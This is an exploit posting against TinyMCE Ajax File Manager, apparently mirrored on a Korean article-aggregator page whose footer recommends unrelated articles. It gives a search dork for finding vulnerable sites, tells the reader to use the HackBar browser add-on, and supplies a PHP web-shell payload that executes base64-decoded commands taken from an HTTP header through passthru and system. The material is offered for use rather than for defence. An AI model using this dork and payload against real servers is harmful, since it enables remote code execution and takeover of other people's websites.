TinyMCE Ajax File Manager suffers from a remote code execution vulnerability.

 ____   ____   ____   _______/  |________   ____   ____ 
 /  _ \ /    \_/ __ \ /  ___/\   __\_  __ \_/ __ \_/ __ \
(  <_> )   |  \  ___/ \___ \  |  |  |  | \/\  ___/\  ___/
 \____/|___|  /\___  >____  > |_ |  |__|    \___  >\___  >
            \/     \/     \/                    \/     \/
      
 
# Exploit Title : timynce Ajax File Manager Remote Code 
# Author        : By onestree
# Software Link : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# tested        : windows 7
# Dork          : inurl:"/plugins/filemanager/" or inurl:'/timynce/plugins/"
 
 
*************************************************************
 
how to run the exploit use firefox web browser
and download firefox add ons HackBar

exploit : 

foo=<?php error_reporting(0);print(system('onestree'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>

 ====================================================================

tutorial video 
https://www.youtube.com/watch?v=ahli-dehYWY


Thanks :
 
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
      
          indonesiancoder - moeslimh4x0r - go-coder
 
spesial my hunny ( Fheby Yahya) :* muaaah

이 내용에 흥미가 있습니까?

현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:

다양한 언어의 JSON

JSON은 Javascript 표기법을 사용하여 데이터 구조를 레이아웃하는 데이터 형식입니다. 그러나 Javascript가 코드에서 이러한 구조를 나타낼 수 있는 유일한 언어는 아닙니다. 저는 일반적으로 '객체'{}...

텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.

CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.

좋은 웹페이지 즐겨찾기

개발자 우수 사이트 수집

개발자가 알아야 할 필수 사이트 100선 추천 우리는 당신을 위해 100개의 자주 사용하는 개발자 학습 사이트를 정리했습니다